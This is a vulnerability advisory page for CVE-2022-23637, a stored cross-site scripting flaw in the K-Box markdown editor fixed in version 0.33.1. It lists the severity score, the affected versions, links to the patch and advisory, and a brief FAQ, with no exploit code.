Vulnerability Description
K-Box is a web-based application to manage documents, images, videos and geodata. Prior to version 0.33.1, a stored Cross-Site-Scripting (XSS) vulnerability is present in the markdown editor used by the document abstract and markdown file preview. A specifically crafted anchor link can, if clicked, execute untrusted javascript actions, like retrieving user cookies. Version 0.33.1 includes a patch that allows discarding unsafe links.
CVSS Score
MEDIUM
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| K-Link | K-Box | < 0.33.1 |
Related Weaknesses (CWE)
References
- https://github.com/k-box/k-box/commit/3bb4df9a4d01aade5bffaa603a514d1a5fabd214PatchThird Party Advisory
- https://github.com/k-box/k-box/security/advisories/GHSA-wwcw-h4mf-mvxfThird Party Advisory
- https://github.com/k-box/k-box/commit/3bb4df9a4d01aade5bffaa603a514d1a5fabd214PatchThird Party Advisory
- https://github.com/k-box/k-box/security/advisories/GHSA-wwcw-h4mf-mvxfThird Party Advisory
FAQ
What is CVE-2022-23637?
CVE-2022-23637 is a vulnerability with a CVSS score of 6.1 (MEDIUM). K-Box is a web-based application to manage documents, images, videos and geodata. Prior to version 0.33.1, a stored Cross-Site-Scripting (XSS) vulnerability is present in the markdown editor used by t...
How severe is CVE-2022-23637?
CVE-2022-23637 has been rated MEDIUM with a CVSS base score of 6.1/10. Review the CVSS metrics above for detailed severity breakdown.
Is there a patch for CVE-2022-23637?
Check the references section above for vendor advisories and patch information. Affected products include: K-Link K-Box.